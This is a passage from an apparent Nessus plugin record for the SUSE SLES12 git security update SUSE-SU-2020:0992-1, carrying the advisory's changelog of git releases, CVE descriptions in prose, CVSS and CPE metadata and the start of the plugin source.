partial addition of regular changes anyway.\n\ngit 2.16.1: 'git clone' segfaulted when cloning a project that happens to track two paths that differ only in case on a case insensitive filesystem\n\ngit 2.16.0 (CVE-2017-15298, bsc#1063412): See https://raw.github.com/git/git/master/Documentation/RelNotes/2.16.0.txt\n\ngit 2.15.1: fix 'auto' column output\n\nfixes to moved lines diffing\n\ndocumentation updates\n\nfix use of repositories immediately under the root directory\n\nimprove usage of libsecret\n\nfixes to various error conditions in git commands\n\nRewrite from sysv init to systemd unit file for git-daemon (bsc#1069803)\n\nReplace references to /var/adm/fillup-templates with new %_fillupdir macro (bsc#1069468)\n\nsplit off p4 to a subpackage (bsc#1067502)\n\nBuild 
with the external libsha1detectcoll (bsc#1042644)\n\ngit 2.15.0: Use of an empty string as a pathspec element that is used for 'everything matches' is still warned and Git asks users to use a more explicit '.' for that instead. Removal scheduled for 2.16\n\nGit now avoids blindly falling back to '.git' when the setup sequence said we are _not_ in Git repository (another corner case removed)\n\n'branch --set-upstream' was retired, deprecated since 1.8\n\nmany other improvements and updates\n\ngit 2.14.3: git send-email understands more cc: formats\n\nfixes so gitk --bisect\n\ngit commit-tree fixed to handle -F file alike\n\nPrevent segfault in 'git cat-file --textconv'\n\nFix function header parsing for HTML\n\nVarious small fixes to user commands and and internal functions\n\ngit 2.14.2: fixes to color output\n\nhttp.{sslkey,sslCert} now interpret '~[username]/' prefix\n\nfixes to walking of reflogs via 'log -g' and friends\n\nvarious fixes to output correctness\n\n'git push --recurse-submodules $there HEAD:$target' is now propagated down to the submodules\n\n'git clone --recurse-submodules --quiet' c$how propagates quiet option down to submodules.\n\n'git svn --localtime' correctness fixes\n\n'git grep -L' and 'git grep --quiet -L' now report same exit code\n\nfixes to 'git apply' when converting line endings\n\nVarious Perl scripts did not use safe_pipe_capture() instead of backticks, leaving them susceptible to end-user input. CVE-2017-14867 bsc#1061041\n\n'git cvsserver' no longer is invoked by 'git daemon' by default\n\ngit 2.14.1 (bsc#1052481): Security fix for CVE-2017-1000117: A malicious third-party can give a crafted 'ssh://...' URL to an unsuspecting victim, and an attempt to visit the URL can result in any program that exists on the victim's machine being executed. 
Such a URL could be placed in the .gitmodules file of a malicious project, and an unsuspecting victim could be tricked into running 'git clone\n--recurse-submodules' to trigger the vulnerability.\n\nA 'ssh://...' URL can result in a 'ssh' command line with a hostname that begins with a dash '-', which would cause the 'ssh' command to instead (mis)treat it as an option. This is now prevented by forbidding such a hostname (which should not impact any real-world usage).\n\nSimilarly, when GIT_PROXY_COMMAND is configured, the command is run with host and port that are parsed out from 'ssh://...' URL; a poorly written GIT_PROXY_COMMAND could be tricked into treating a string that begins with a dash '-' as an option. This is now prevented by forbidding such a hostname and port number (again, which should not impact any real-world usage).\n\nIn the same spirit, a repository name that begins with a dash '-' is also forbidden now.\n\ngit 2.14.0: Use of an empty string as a pathspec element that is used for 'everything matches' is deprecated, use '.'\n\nAvoid blindly falling back to '.git' when the setup sequence indicates operation not on a Git repository\n\n'indent heuristics' are now the default.\n\nBuilds with pcre2\n\nMany bug fixes, improvements and updates\n\ngit 2.13.4: Update the character width tables.\n\nFix an alias that contained an uppercase letter\n\nProgress meter fixes\n\ngit gc concurrency fixes\n\ngit 2.13.3: various internal bug fixes\n\nFix a regression to 'git rebase -i'\n\nCorrect unaligned 32-bit access in pack-bitmap code\n\nTighten error checks for invalid 'git apply' input\n\nThe split index code did not honor core.sharedrepository setting correctly\n\nFix 'git branch --list' handling of color.branch.local\n\ngit 2.13.2: 'collision detecting' SHA-1 update for platform fixes\n\n'git checkout --recurse-submodules' did not quite work with a submodule that itself has submodules.\n\nThe 'run-command' API implementation has been made more robust against 
dead-locking in a threaded environment.\n\n'git clean -d' now only cleans ignored files with '-x'\n\n'git status --ignored' did not list ignored and untracked files without '-uall'\n\n'git pull --rebase --autostash' didn't auto-stash when the local history fast-forwards to the upstream.\n\n'git describe --contains' gives as much weight to lightweight tags as annotated tags\n\nFix 'git stash push <pathspec>' from a subdirectory\n\ngit 2.13.1: Setting 'log.decorate=false' in the configuration file did not take effect in v2.13, which has been corrected.\n\ncorrections to documentation and command help output\n\ngarbage collection fixes\n\nmemory leaks fixed\n\nreceive-pack now makes sure that the push certificate records the same set of push options used for pushing\n\nshell completion corrections for git stash\n\nfix 'git clone --config var=val' with empty strings\n\ninternal efficiency improvements\n\nUpdate sha1 collision detection code for big-endian platforms and platforms not supporting unaligned fetches\n\nFix packaging of documentation\n\ngit 2.13.0: empty string as a pathspec element for 'everything matches' is still warned, for future removal.\n\ndeprecated argument order 'git merge <msg> HEAD <commit>...' was removed\n\ndefault location '~/.git-credential-cache/socket' for the socket used to communicate with the credential-cache daemon moved to '~/.cache/git/credential/socket'.\n\nnow avoid blindly falling back to '.git' when the setup sequence indicated otherwise\n\nmany workflow features, improvements and bug fixes\n\nadd a hardened implementation of SHA1 in response to practical collision attacks (CVE-2005-4900, bsc#1042640)\n\nCVE-2017-8386: On a server running git-shell as login shell to restrict user to git commands, remote users may have been able to have git service programs spawn an interactive pager and thus escape the shell restrictions. 
(bsc#1038395)\n\nChanges in pcre2: Include the libraries, development and tools packages.\n\ngit uses only libpcre2-8 so far, but this allows further application usage of pcre2.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-15T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : git (SUSE-SU-2020:0992-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-4900", "CVE-2017-1000117", "CVE-2017-14867", "CVE-2017-15298", "CVE-2017-8386", "CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456", "CVE-2018-19486", "CVE-2019-1348", "CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1351", "CVE-2019-1352", "CVE-2019-1353", "CVE-2019-1354", "CVE-2019-1387", "CVE-2019-19604", "CVE-2020-5260"], "modified": "2022-05-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:git-core", "p-cpe:/a:novell:suse_linux:git-core-debuginfo", "p-cpe:/a:novell:suse_linux:git-debugsource", "p-cpe:/a:novell:suse_linux:libpcre2-16", "p-cpe:/a:novell:suse_linux:libpcre2-16-0-debuginfo", "p-cpe:/a:novell:suse_linux:libpcre2-32", "p-cpe:/a:novell:suse_linux:libpcre2-32-0-debuginfo", "p-cpe:/a:novell:suse_linux:libpcre2-8", "p-cpe:/a:novell:suse_linux:libpcre2-8-0-debuginfo", "p-cpe:/a:novell:suse_linux:libpcre2-posix2", "p-cpe:/a:novell:suse_linux:libpcre2-posix2-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-0992-1.NASL", "href": "https://www.tenable.com/plugins/nessus/135580", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:0992-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n 
script_id(135580);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\n \"CVE-2005-4900\",\n \"CVE-2017-8386\",\n \"CVE-2017-14867\",\n \"CVE-2017-15298\",\n \"CVE-2017-1000117\",\n \"CVE-2018-11233\",\n \"CVE-2018-11235\",\n \"CVE-2018-17456\",\n \"CVE-2018-19486\",\n \"CVE-2019-1348\",\n \"CVE-2019-1349\",\n \"CVE-2019-1350\",\n \"CVE-2019-1351\",\n \"CVE-2019-1352\",\n \"CVE-2019-1353\",\n \"CVE-2019-1354\",\n \"CVE-2019-1387\",\n \"CVE-2019-19604\",\n \"CVE-2020-5260\"\n );\n\n script_name(english:\"SUSE SLES12 Security Update : git (SUSE-SU-2020:0992-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for git fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2020-5260: With a crafted URL that contains a newline in it, the\ncredential helper machinery can be fooled to give credential\ninformation for a wrong host (bsc#1168930).\n\nNon-security issue fixed :\n\ngit was updated to 2.26.0 for SHA256 support (bsc#1167890,\njsc#SLE-11608): the xinetd snippet was removed\n\nthe System V init script for the git-daemon was replaced by a systemd\nservice file of the same name.\n\ngit 2.26.0: 'git rebase' now uses a different backend that is based on\nthe 'merge' machinery by default. 
The 'rebase.backend' configuration\nvariable reverts to old behaviour when set to 'apply'\n\nImproved handling of sparse checkouts\n\nImprovements to many commands and internal features\n\ngit 2.25.1: 'git commit' now honors advise.statusHints\n\nvarious updates, bug fixes and documentation updates\n\ngit 2.25.0: The branch description ('git branch --edit-description')\nhas been used to fill the body of the cover letters by the\nformat-patch command; this has been enhanced so that the subject can\nalso be filled.\n\nA few commands learned to take the pathspec from the standard input or\na named file, instead of taking it as the command line arguments, with\nthe '--pathspec-from-file' option.\n\nTest updates to prepare for SHA-2 transition continues.\n\nRedo 'git name-rev' to avoid recursive calls.\n\nWhen all files from some subdirectory were renamed to the root\ndirectory, the directory rename heuristics would fail to detect that\nas a rename/merge of the subdirectory to the root directory, which has\nbeen corrected.\n\nHTTP transport had possible allocator/deallocator mismatch, which has\nbeen corrected.\n\ngit 2.24.1: CVE-2019-1348: The --export-marks option of fast-import is\nexposed also via the in-stream command feature export-marks=... 
and it\nallows overwriting arbitrary paths (bsc#1158785)\n\nCVE-2019-1349: on Windows, when submodules are cloned recursively,\nunder certain circumstances Git could be fooled into using the same\nGit directory twice (bsc#1158787)\n\nCVE-2019-1350: Incorrect quoting of command-line arguments allowed\nremote code execution during a recursive clone in conjunction with SSH\nURLs (bsc#1158788)\n\nCVE-2019-1351: on Windows mistakes drive letters outside of the\nUS-English alphabet as relative paths (bsc#1158789)\n\nCVE-2019-1352: on Windows was unaware of NTFS Alternate Data Streams\n(bsc#1158790)\n\nCVE-2019-1353: when run in the Windows Subsystem for Linux while\naccessing a working directory on a regular Windows drive, none of the\nNTFS protections were active (bsc#1158791)\n\nCVE-2019-1354: on Windows refuses to write tracked files with\nfilenames that contain backslashes (bsc#1158792)\n\nCVE-2019-1387: Recursive clones vulnerability that is caused by\ntoo-lax validation of submodule names, allowing very targeted attacks\nvia remote code execution in recursive clones (bsc#1158793)\n\nCVE-2019-19604: a recursive clone followed by a submodule update could\nexecute code contained within the repository without the user\nexplicitly having asked for that (bsc#1158795)\n\nFix building with asciidoctor and without DocBook4 stylesheets.\n\ngit 2.24.0 The command line parser learned '--end-of-options'\nnotation.\n\nA mechanism to affect the default setting for a (related) group of\nconfiguration variables is introduced.\n\n'git fetch' learned '--set-upstream' option to help those who first\nclone from their private fork they intend to push to, add the true\nupstream via 'git remote add' and then 'git fetch' from it.\n\nfixes and improvements to UI, workflow and features, bash completion\nfixes\n\npart of it merged upstream\n\nthe Makefile attempted to download some documentation, banned\n\ngit 2.23.0: The '--base' option of 'format-patch' computed the\npatch-ids for 
prerequisite patches in an unstable way, which has been\nupdated to compute in a way that is compatible with 'git patch-id\n\n--stable'.\n\nThe 'git log' command by default behaves as if the --mailmap option\nwas given.\n\nfixes and improvements to UI, workflow and features\n\ngit 2.22.1: A relative pathname given to 'git init\n--template=<path><repo>' ought to be relative to the directory 'git\ninit' gets invoked in, but it instead was made relative to the\nrepository, which has been corrected. </repo></path>\n\n'git worktree add' used to fail when another worktree connected to the\nsame repository was corrupt, which has been corrected.\n\n'git am -i --resolved' segfaulted after trying to see a commit as if\nit were a tree, which has been corrected.\n\n'git merge --squash' is designed to update the working tree and the\nindex without creating the commit, and this cannot be countermanded by\nadding the '--commit' option; the command now refuses to work when\nboth options are given.\n\nUpdate to Unicode 12.1 width table.\n\n'git request-pull' learned to warn when the ref we ask them to pull\nfrom in the local repository and in the published repository are\ndifferent.\n\n'git fetch' into a lazy clone forgot to fetch base objects that are\nnecessary to complete delta in a thin packfile, which has been\ncorrected.\n\nThe URL decoding code has been updated to avoid going past the end of\nthe string while parsing %-<hex>-<hex> sequence. </hex></hex>\n\n'git clean' silently skipped a path when it cannot lstat() it; now it\ngives a warning.\n\n'git rm' to resolve a conflicted path leaked an internal message\n'needs merge' before actually removing the path, which was confusing.\nThis has been corrected.\n\nMany more bugfixes and code cleanups.\n\nremoval of SuSEfirewall2 service, since SuSEfirewall2 has been\nreplaced by firewalld, see [1]. 
[1]:\nhttps://lists.opensuse.org/opensuse-factory/2019-01/msg00490.html\n\ngit 2.22.0: The filter specification '--filter=sparse:path=<path>'\nused to create a lazy/partial clone has been removed. Using a blob\nthat is part of the project as sparse specification is still supported\nwith the '--filter=sparse:oid=<blob>' option </blob></path>\n\n'git checkout --no-overlay' can be used to trigger a new mode of\nchecking out paths out of the tree-ish, that allows paths that match\nthe pathspec that are in the current index and working tree and are\nnot in the tree-ish.\n\nFour new configuration variables {author,committer}.{name,email} have\nbeen introduced to override user.{name,email} in more specific cases.\n\n'git branch' learned a new subcommand '--show-current'.\n\nThe command line completion (in contrib/) has been taught to complete\nmore subcommand parameters.\n\nThe completion helper code now pays attention to repository-local\nconfiguration (when available), which allows --list-cmds to honour a\nrepository specific setting of completion.commands, for example.\n\nThe list of conflicted paths shown in the editor while concluding a\nconflicted merge was shown above the scissors line when the clean-up\nmode is set to 'scissors', even though it was commented out just like\nthe list of updated paths and other information to help the user\nexplain the merge better.\n\n'git rebase' that was reimplemented in C did not set ORIG_HEAD\ncorrectly, which has been corrected.\n\n'git worktree add' used to do a 'find an available name with stat and\nthen mkdir', which is race-prone. This has been fixed by using mkdir\nand reacting to EEXIST in a loop.\n\nupdate git-web AppArmor profile for bash and tar usrMerge\n(bsc#1132350)\n\ngit 2.21.0: Historically, the '-m' (mainline) option can only be used\nfor 'git cherry-pick' and 'git revert' when working with a merge\ncommit. 
This version of Git no longer warns or errors out when working\nwith a single-parent commit, as long as the argument to the '-m'\noption is 1 (i.e. it has only one parent, and the request is to pick\nor revert relative to that first parent). Scripts that relied on the\nbehaviour may get broken with this change.\n\nSmall fixes and features for fast-export and fast-import.\n\nThe 'http.version' configuration variable can be used with recent\nenough versions of cURL library to force the version of HTTP used to\ntalk when fetching and pushing.\n\n'git push $there $src:$dst' rejects when $dst is not a fully qualified\nrefname and it is not clear what the end user meant.\n\nUpdate 'git multimail' from the upstream.\n\nA new date format '--date=human' that morphs its output depending on\nhow far the time is from the current time has been introduced.\n'--date=auto:human' can be used to use this new format (or any\nexisting format) when the output is going to the pager or to the\nterminal, and otherwise the default format.\n\nFix worktree creation race (bsc#1114225).\n\ngit 2.20.1: portability fixes\n\n'git help -a' did not work well when an overly long alias was defined\n\nno longer squelched an error message when the run_command API failed\nto run a missing command\n\ngit 2.20.0: 'git help -a' now gives verbose output (same as 'git help\n-av'). Those who want the old output may say 'git help --no-verbose\n-a'..\n\n'git send-email' learned to grab address-looking string on any trailer\nwhose name ends with '-by'.\n\n'git format-patch' learned new '--interdiff' and '--range-diff'\noptions to explain the difference between this version and the\nprevious attempt in the cover letter (or after the three-dashes as a\ncomment).\n\nDeveloper builds now use -Wunused-function compilation option.\n\nFix a bug in which the same path could be registered under multiple\nworktree entries if the path was missing (for instance, was removed\nmanually). 
Also, as a convenience, expand the number of cases in which\n\n--force is applicable.\n\nThe overly large Documentation/config.txt file have been split into\nmillion little pieces. This potentially allows each individual piece\nto be included into the manual page of the command it affects more\neasily.\n\nMalformed or crafted data in packstream can make our code attempt to\nread or write past the allocated buffer and abort, instead of\nreporting an error, which has been fixed.\n\nFix for a long-standing bug that leaves the index file corrupt when it\nshrinks during a partial commit.\n\n'git merge' and 'git pull' that merges into an unborn branch used to\ncompletely ignore '--verify-signatures', which has been corrected.\n\n...and much more features and fixes\n\nfix CVE-2018-19486 (bsc#1117257)\n\ngit 2.19.2: various bug fixes for multiple subcommands and operations\n\ngit 2.19.1: CVE-2018-17456: Specially crafted .gitmodules files may\nhave allowed arbitrary code execution when the repository is cloned\nwith\n\n--recurse-submodules (bsc#1110949)\n\ngit 2.19.0: 'git diff' compares the index and the working tree. For\npaths added with intent-to-add bit, the command shows the full\ncontents of them as added, but the paths themselves were not marked as\nnew files. They are now shown as new by default.\n\n'git apply' learned the '--intent-to-add' option so that an otherwise\nworking-tree-only application of a patch will add new paths to the\nindex marked with the 'intent-to-add' bit.\n\n'git grep' learned the '--column' option that gives not just the line\nnumber but the column number of the hit.\n\nThe '-l' option in 'git branch -l' is an unfortunate short-hand for\n'--create-reflog', but many users, both old and new, somehow expect it\nto be something else, perhaps '--list'. 
This step warns when '-l' is\nused as a short-hand for '--create-reflog' and warns about the future\nrepurposing of the it when it is used.\n\nThe userdiff pattern for .php has been updated.\n\nThe content-transfer-encoding of the message 'git send-email' sends\nout by default was 8bit, which can cause trouble when there is an\noverlong line to bust RFC 5322/2822 limit. A new option 'auto' to\nautomatically switch to quoted-printable when there is such a line in\nthe payload has been introduced and is made the default.\n\n'git checkout' and 'git worktree add' learned to honor\ncheckout.defaultRemote when auto-vivifying a local branch out of a\nremote tracking branch in a repository with multiple remotes that have\ntracking branches that share the same names. (merge 8d7b558bae\nab/checkout-default-remote later to maint).\n\n'git grep' learned the '--only-matching' option.\n\n'git rebase --rebase-merges' mode now handles octopus merges as well.\n\nAdd a server-side knob to skip commits in exponential/fibbonacci\nstride in an attempt to cover wider swath of history with a smaller\nnumber of iterations, potentially accepting a larger packfile\ntransfer, instead of going back one commit a time during common\nancestor discovery during the 'git fetch' transaction. (merge\n42cc7485a2 jt/fetch-negotiator-skipping later to maint).\n\nA new configuration variable core.usereplacerefs has been added,\nprimarily to help server installations that want to ignore the replace\nmechanism altogether.\n\nTeach 'git tag -s' etc. a few configuration variables (gpg.format that\ncan be set to 'openpgp' or 'x509', and gpg.<format>.program that is\nused to specify what program to use to deal with the format) to allow\nx.509 certs with CMS via 'gpgsm' to be used instead of openpgp via\n'gnupg'. 
</format>\n\nMany more strings are prepared for l10n.\n\n'git p4 submit' learns to ask its own pre-submit hook if it should\ncontinue with submitting.\n\nThe test performed at the receiving end of 'git push' to prevent bad\nobjects from entering repository can be customized via receive.fsck.*\nconfiguration variables; we now have gained a counterpart to do the\nsame on the 'git fetch' side, with fetch.fsck.* configuration\nvariables.\n\n'git pull --rebase=interactive' learned 'i' as a short-hand for\n'interactive'.\n\n'git instaweb' has been adjusted to run better with newer Apache on\nRedHat based distros.\n\n'git range-diff' is a reimplementation of 'git tbdiff' that lets us\ncompare individual patches in two iterations of a topic.\n\nThe sideband code learned to optionally paint selected keywords at the\nbeginning of incoming lines on the receiving end.\n\n'git branch --list' learned to take the default sort order from the\n'branch.sort' configuration variable, just like 'git tag --list' pays\nattention to 'tag.sort'.\n\n'git worktree' command learned '--quiet' option to make it less\nverbose.\n\ngit 2.18.0: improvements to rename detection logic\n\nWhen built with more recent cURL, GIT_SSL_VERSION can now specify\n'tlsv1.3' as its value.\n\n'git mergetools' learned talking to guiffy.\n\nvarious other workflow improvements and fixes\n\nperformance improvements and other developer visible fixes\n\nUpdate to git 2.16.4: security fix release\n\ngit 2.17.1: Submodule 'names' come from the untrusted .gitmodules\nfile, but we blindly append them to $GIT_DIR/modules to create our\non-disk repo paths. This means you can do bad things by putting '../'\ninto the name. 
We now enforce some rules for submodule names which\nwill cause Git to ignore these malicious names (CVE-2018-11235,\nbsc#1095219)\n\nIt was possible to trick the code that sanity-checks paths on NTFS\ninto reading random piece of memory (CVE-2018-11233, bsc#1095218)\n\nSupport on the server side to reject pushes to repositories that\nattempt to create such problematic .gitmodules file etc. as tracked\ncontents, to help hosting sites protect their customers by preventing\nmalicious contents from spreading.\n\ngit 2.17.0: 'diff' family of commands learned\n'--find-object=<object-id>' option to limit the findings to changes\nthat involve the named object. </object-id>\n\n'git format-patch' learned to give 72-cols to diffstat, which is\nconsistent with other line length limits the subcommand uses for its\noutput meant for e-mails.\n\nThe log from 'git daemon' can be redirected with a new option; one\nrelevant use case is to send the log to standard error (instead of\nsyslog) when running it from inetd.\n\n'git rebase' learned to take '--allow-empty-message' option.\n\n'git am' has learned the '--quit' option, in addition to the existing\n'--abort' option; having the pair mirrors a few other commands like\n'rebase' and 'cherry-pick'.\n\n'git worktree add' learned to run the post-checkout hook, just like\n'git clone' runs it upon the initial checkout.\n\n'git tag' learned an explicit '--edit' option that allows the message\ngiven via '-m' and '-F' to be further edited.\n\n'git fetch --prune-tags' may be used as a handy short-hand for getting\nrid of stale tags that are locally held.\n\nThe new '--show-current-patch' option gives an end-user facing way to\nget the diff being applied when 'git rebase' (and 'git am') stops with\na conflict.\n\n'git add -p' used to offer '/' (look for a matching hunk) as a choice,\neven there was only one hunk, which has been corrected. Also the\nsingle-key help is now given only for keys that are enabled (e.g. 
help\nfor '/' won't be shown when there is only one hunk).\n\nSince Git 1.7.9, 'git merge' defaulted to --no-ff (i.e. even when the\nside branch being merged is a descendant of the current commit, create\na merge commit instead of fast-forwarding) when merging a tag object.\nThis was appropriate default for integrators who pull signed tags from\ntheir downstream contributors, but caused an unnecessary merges when\nused by downstream contributors who habitually 'catch up' their topic\nbranches with tagged releases from the upstream. Update 'git merge' to\ndefault to --no-ff only when merging a tag object that does *not* sit\nat its usual place in refs/tags/ hierarchy, and allow fast-forwarding\notherwise, to mitigate the problem.\n\n'git status' can spend a lot of cycles to compute the relation between\nthe current branch and its upstream, which can now be disabled with\n'--no-ahead-behind' option.\n\n'git diff' and friends learned funcname patterns for Go language\nsource files.\n\n'git send-email' learned '--reply-to=<address>' option. </address>\n\nFuncname pattern used for C# now recognizes 'async' keyword.\n\nIn a way similar to how 'git tag' learned to honor the pager setting\nonly in the list mode, 'git config' learned to ignore the pager\nsetting when it is used for setting values (i.e. 
when the purpose of\nthe operation is not to 'show').\n\nUse %license instead of %doc [bsc#1082318]\n\ngit 2.16.3: 'git status' after moving a path in the working tree\n(hence making it appear 'removed') and then adding with the -N option\n(hence making that appear 'added') detected it as a rename, but did\nnot report the old and new pathnames correctly.\n\n'git commit --fixup' did not allow '-m<message>' option to be used at\nthe same time; allow it to annotate resulting commit with more text.\n</message>\n\nWhen resetting the working tree files recursively, the working tree of\nsubmodules are now also reset to match.\n\nFix for a commented-out code to adjust it to a rather old API change\naround object ID.\n\nWhen there are too many changed paths, 'git diff' showed a warning\nmessage but in the middle of a line.\n\nThe http tracing code, often used to debug connection issues, learned\nto redact potentially sensitive information from its output so that it\ncan be more safely sharable.\n\nCrash fix for a corner case where an error codepath tried to unlock\nwhat it did not acquire lock on.\n\nThe split-index mode had a few corner case bugs fixed.\n\nAssorted fixes to 'git daemon'.\n\nCompletion of 'git merge -s<strategy>' (in contrib/) did not work well\nin non-C locale. </strategy>\n\nWorkaround for segfault with more recent versions of SVN.\n\nRecently introduced leaks in fsck have been plugged.\n\nTravis CI integration now builds the executable in 'script' phase to\nfollow the established practice, rather than during 'before_script'\nphase. 
This allows the CI categorize the failures better ('failed' is\nproject's fault, 'errored' is build environment's).\n\nDrop superfluous xinetd snippet, no longer used (bsc#1084460)\n\nBuild with asciidoctor for the recent distros (bsc#1075764)\n\nMove %{?systemd_requires} to daemon subpackage\n\nCreate subpackage for libsecret credential helper.\n\ngit 2.16.2: An old regression in 'git describe --all $annotated_tag^0'\nhas been fixed.\n\n'git svn dcommit' did not take into account the fact that a svn+ssh://\nURL with a username@ (typically used for pushing) refers to the same\nSVN repository without the username@ and failed when svn.pushmergeinfo\noption is set.\n\n'git merge -Xours/-Xtheirs' learned to use our/their version when\nresolving a conflicting updates to a symbolic link.\n\n'git clone $there $here' is allowed even when here directory exists as\nlong as it is an empty directory, but the command incorrectly removed\nit upon a failure of the operation.\n\n'git stash -- <pathspec>' incorrectly blew away untracked files in the\ndirectory that matched the pathspec, which has been corrected.\n\n'git add -p' was taught to ignore local changes to submodules as they\ndo not interfere with the partial addition of regular changes anyway.\n\ngit 2.16.1: 'git clone' segfaulted when cloning a project that happens\nto track two paths that differ only in case on a case insensitive\nfilesystem\n\ngit 2.16.0 (CVE-2017-15298, bsc#1063412): See\nhttps://raw.github.com/git/git/master/Documentation/RelNotes/2.16.0.tx\nt\n\ngit 2.15.1: fix 'auto' column output\n\nfixes to moved lines diffing\n\ndocumentation updates\n\nfix use of repositories immediately under the root directory\n\nimprove usage of libsecret\n\nfixes to various error conditions in git commands\n\nRewrite from sysv init to systemd unit file for git-daemon\n(bsc#1069803)\n\nReplace references to /var/adm/fillup-templates with new %_fillupdir\nmacro (bsc#1069468)\n\nsplit off p4 to a subpackage 
(bsc#1067502)\n\nBuild with the external libsha1detectcoll (bsc#1042644)\n\ngit 2.15.0: Use of an empty string as a pathspec element that is used\nfor 'everything matches' is still warned and Git asks users to use a\nmore explicit '.' for that instead. Removal scheduled for 2.16\n\nGit now avoids blindly falling back to '.git' when the setup sequence\nsaid we are _not_ in Git repository (another corner case removed)\n\n'branch --set-upstream' was retired, deprecated since 1.8\n\nmany other improvements and updates\n\ngit 2.14.3: git send-email understands more cc: formats\n\nfixes so gitk --bisect\n\ngit commit-tree fixed to handle -F file alike\n\nPrevent segfault in 'git cat-file --textconv'\n\nFix function header parsing for HTML\n\nVarious small fixes to user commands and internal functions\n\ngit 2.14.2: fixes to color output\n\nhttp.{sslkey,sslCert} now interpret '~[username]/' prefix\n\nfixes to walking of reflogs via 'log -g' and friends\n\nvarious fixes to output correctness\n\n'git push --recurse-submodules $there HEAD:$target' is now propagated\ndown to the submodules\n\n'git clone --recurse-submodules --quiet' now propagates quiet option\ndown to submodules.\n\n'git svn --localtime' correctness fixes\n\n'git grep -L' and 'git grep --quiet -L' now report same exit code\n\nfixes to 'git apply' when converting line endings\n\nVarious Perl scripts did not use safe_pipe_capture() instead of\nbackticks, leaving them susceptible to end-user input. CVE-2017-14867\nbsc#1061041\n\n'git cvsserver' no longer is invoked by 'git daemon' by default\n\ngit 2.14.1 (bsc#1052481): Security fix for CVE-2017-1000117: A\nmalicious third-party can give a crafted 'ssh://...' URL to an\nunsuspecting victim, and an attempt to visit the URL can result in any\nprogram that exists on the victim's machine being executed. 
Such a URL\ncould be placed in the .gitmodules file of a malicious project, and an\nunsuspecting victim could be tricked into running 'git clone\n--recurse-submodules' to trigger the vulnerability.\n\nA 'ssh://...' URL can result in a 'ssh' command line with a hostname\nthat begins with a dash '-', which would cause the 'ssh' command to\ninstead (mis)treat it as an option. This is now prevented by\nforbidding such a hostname (which should not impact any real-world\nusage).\n\nSimilarly, when GIT_PROXY_COMMAND is configured, the command is run\nwith host and port that are parsed out from 'ssh://...' URL; a poorly\nwritten GIT_PROXY_COMMAND could be tricked into treating a string that\nbegins with a dash '-' as an option. This is now prevented by\nforbidding such a hostname and port number (again, which should not\nimpact any real-world usage).\n\nIn the same spirit, a repository name that begins with a dash '-' is\nalso forbidden now.\n\ngit 2.14.0: Use of an empty string as a pathspec element that is used\nfor 'everything matches' is deprecated, use '.'\n\nAvoid blindly falling back to '.git' when the setup sequence indicates\noperation not on a Git repository\n\n'indent heuristics' are now the default.\n\nBuilds with pcre2\n\nMany bug fixes, improvements and updates\n\ngit 2.13.4: Update the character width tables.\n\nFix an alias that contained an uppercase letter\n\nProgress meter fixes\n\ngit gc concurrency fixes\n\ngit 2.13.3: various internal bug fixes\n\nFix a regression to 'git rebase -i'\n\nCorrect unaligned 32-bit access in pack-bitmap code\n\nTighten error checks for invalid 'git apply' input\n\nThe split index code did not honor core.sharedrepository setting\ncorrectly\n\nFix 'git branch --list' handling of color.branch.local\n\ngit 2.13.2: 'collision detecting' SHA-1 update for platform fixes\n\n'git checkout --recurse-submodules' did not quite work with a\nsubmodule that itself has submodules.\n\nThe 'run-command' API implementation has been made more 
robust against\ndead-locking in a threaded environment.\n\n'git clean -d' now only cleans ignored files with '-x'\n\n'git status --ignored' did not list ignored and untracked files\nwithout '-uall'\n\n'git pull --rebase --autostash' didn't auto-stash when the local\nhistory fast-forwards to the upstream.\n\n'git describe --contains' gives as much weight to lightweight tags as\nannotated tags\n\nFix 'git stash push <pathspec>' from a subdirectory\n\ngit 2.13.1: Setting 'log.decorate=false' in the configuration file did\nnot take effect in v2.13, which has been corrected.\n\ncorrections to documentation and command help output\n\ngarbage collection fixes\n\nmemory leaks fixed\n\nreceive-pack now makes sure that the push certificate records the same\nset of push options used for pushing\n\nshell completion corrections for git stash\n\nfix 'git clone --config var=val' with empty strings\n\ninternal efficiency improvements\n\nUpdate sha1 collision detection code for big-endian platforms and\nplatforms not supporting unaligned fetches\n\nFix packaging of documentation\n\ngit 2.13.0: empty string as a pathspec element for 'everything\nmatches' is still warned, for future removal.\n\ndeprecated argument order 'git merge <msg> HEAD <commit>...' was\nremoved\n\ndefault location '~/.git-credential-cache/socket' for the socket used\nto communicate with the credential-cache daemon moved to\n'~/.cache/git/credential/socket'.\n\nnow avoid blindly falling back to '.git' when the setup sequence\nindicated otherwise\n\nmany workflow features, improvements and bug fixes\n\nadd a hardened implementation of SHA1 in response to practical\ncollision attacks (CVE-2005-4900, bsc#1042640)\n\nCVE-2017-8386: On a server running git-shell as login shell to\nrestrict user to git commands, remote users may have been able to have\ngit service programs spawn an interactive pager and thus escape the\nshell restrictions. 
